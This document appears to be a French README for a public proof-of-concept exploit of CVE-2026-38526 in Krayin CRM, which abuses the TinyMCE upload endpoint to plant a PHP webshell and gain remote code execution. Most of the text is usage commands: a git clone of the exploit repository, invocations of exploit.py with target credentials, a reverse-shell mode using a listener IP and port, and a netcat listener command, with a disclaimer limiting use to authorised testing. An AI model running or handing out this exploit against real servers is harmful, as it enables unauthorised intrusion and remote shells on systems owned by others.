
Preuve de concept de la CVE-2026-38526 dans Krayin CRM <= v2.2.x. Téléversement arbitraire de fichiers menant à une exécution de code à distance.
Krayin CRM (≤ 2.2.x) - Téléversement de fichiers sans restriction conduisant à une exécution de code à distance.
Ce PoC exploite le point de terminaison de téléversement TinyMCE vulnérable (/admin/tinymce/upload) pour téléverser un webshell PHP et exécuter des commandes sur le serveur.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
Utilisation
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
Démarrer le listener :
nc -lvnp 4444
Exécuter l'exploit :
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
Cet exploit est destiné uniquement à des fins éducatives et aux tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes que vous n'avez pas l'autorisation explicite de tester est illégale.
Versions concernées
Krayin CRM ≤ 2.2.x CVE : CVE-2026-38526
Auteur : pawpic Date : 2026
| Argument | Description | Requis |
|---|
| -u, --url | URL de base cible | Oui |
| -e, --email | E-mail de connexion | Oui |
| -p, --password | Mot de passe de connexion | Oui |
| -c, --cmd | Exécuter une commande unique | Non |
| --lhost | Votre IP pour le shell inversé | Oui (si --cmd n'est pas utilisé) |
| --lport | Port d'écoute | Non (défaut : 4444) |